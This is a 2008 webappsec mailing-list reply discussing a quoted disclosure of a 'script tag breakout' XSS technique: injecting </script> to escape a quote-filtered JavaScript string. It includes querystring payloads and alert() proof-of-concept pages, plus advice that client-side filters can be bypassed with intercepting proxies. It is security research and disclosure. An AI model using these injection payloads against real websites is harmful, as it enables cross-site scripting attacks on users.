Re: Script Tag Breakout

[Taufiq Ali <taufiq.ali () niiconsulting com>]

Hey Nick,

This is is very much there & there lot of grease monkey (Firefox addon) 
scripts that do the same. However if the website uses javascript for 
getting rid of the meta characters then its poor design as this can very 
much be bypasses using a application proxies like paros, webscrab, burp 
suite etc. So once the script verifies the code they can be then 
captured in above mentioned proxies & manipulated. What you just 
mentioned will work with websites that use javascript to filter out 
their meta characters.

Taufiq

-------- Original Message --------
Subject: Script Tag Breakout
From: Nick Von Dadelszen <nvondad () gmail com>
To: webappsec () securityfocus com
Date: 10/20/2008 7:04 AM

> ey all,
>
> Not sure if this is a known issue or not but thought I would share.
> Its not a common situation to occur but I've used it a couple of times
> in the last couple of years while testing apps.
>
> -- Description --
> Able to break out of a string variable without using quotes through
> the use of a </script> tag.
>
> For example, if the code of a page does the following:
> <script>
> somestring = "[your querystring here]";
> </script>
>
> You would normally break out of this with the following
> querystring=";[code here]
>
> If the code checks for a double or single quote and removes it, you
> cannot normally break out of this code.  However, you are able to
> close the current script tag, even from within a string variable.  So,
> the following two breakouts work:
> querystring=</script>[HTML here]
> querystring=</script><script>[javascript here]</script>
>
> The resulting code looks something like the following:
> <html>
> <body>
> <h1>Script Tag Breakout PoC</h1>
> <script>
> string = "</script><h1>Parsed HTML Code Here</h1><!--";
> </script>
> </body>
> </html>
>
> Or:
> <html>
> <body>
> <h1>Script Tag Breakout PoC</h1>
> <script>
> string = "</script><script>alert(document.location);</script>";
> </script>
> </body>
> </html>
>
> In the above HTML, the javascript alert function is called regardless
> of it being contained within a string variable.
>
> -- Tested Browsers --
> All version of IE and Firefox up to and including IE 7 and firefox 3.
>
> ---------------------------------------------------------
> Nick von Dadelszen
> Lateral Security
> www.lateralsecurity.com
> ---------------------------------------------------------
>
> -------------------------------------------------------------------------
> Sponsored by: Watchfire 
> Methodologies & Tools for Web Application Security Assessment 
> With the rapid rise in the number and types of security threats, web application security assessments should be considered a crucial phase in the development of any web application. What methodology should be followed? What tools can accelerate the assessment process? Download this Whitepaper today! 
>
> https://www.watchfire.com/securearea/whitepapers.aspx?id=70170000000940F
> -------------------------------------------------------------------------


-------------------------------------------------------------------------
Sponsored by: Watchfire 
Methodologies & Tools for Web Application Security Assessment 
With the rapid rise in the number and types of security threats, web application security assessments should be considered a crucial phase in the development of any web application. What methodology should be followed? What tools can accelerate the assessment process? Download this Whitepaper today! 

https://www.watchfire.com/securearea/whitepapers.aspx?id=70170000000940F
-------------------------------------------------------------------------